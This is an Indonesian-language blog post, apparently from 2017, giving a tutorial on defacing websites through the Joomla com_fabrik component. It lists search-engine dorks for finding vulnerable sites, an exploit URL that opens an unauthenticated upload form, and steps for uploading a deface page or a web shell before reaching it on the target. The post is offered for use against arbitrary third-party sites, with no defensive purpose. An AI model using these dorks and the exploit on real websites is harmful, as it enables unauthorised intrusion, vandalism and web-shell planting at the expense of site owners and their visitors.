Saturday, August 12, 2017

Cara Deface Metode Com Fabrik

Hallo Sobat Sobat dah lama banget gw ngak update *ngak lama banget sih...
OK sesuai judul gw bakal update Tutorial Deface Metode Com Fabrik hemm ini tutorial lumayan simpel dan mudah banget ( lumayan buat nembak gebetan :v ) OK langsung aja

Dork : 
inurl:viewTable?cid= site:com

inurl:viewTable?cid= site:net
inurl:viewTable?cid= site:org
( kembangin lagi pakek imajinasi Hentonger lo )

Exploit :
index.php?option=com_fabrik&c=import&view=import&filetype=csv&table=1


Ok langsung tutorial nya pertama tama ngedork dulu pakek Dork di atas

Pilih Website yg menurut kamu itu vuln ok ... lalu masukan exploit ke bar url
nanti ada Tombol upload kek gambar di bawah ini 


Klik Choose File Lalu Pilih Script Deface kalian
( kalo web tersebut vuln terhadap .phtml tidak ada slahanya mengupload shell saja ) 

Terus Selesai deh :)

kak kak Gimana cara aksesnya ?

cara aksessnya gini :  www.website-target.co.li/media/file-lo.html

Sekian dari gw semoga bermanfaat ! Jika kurang jelas kalian bisa menonton video di box ini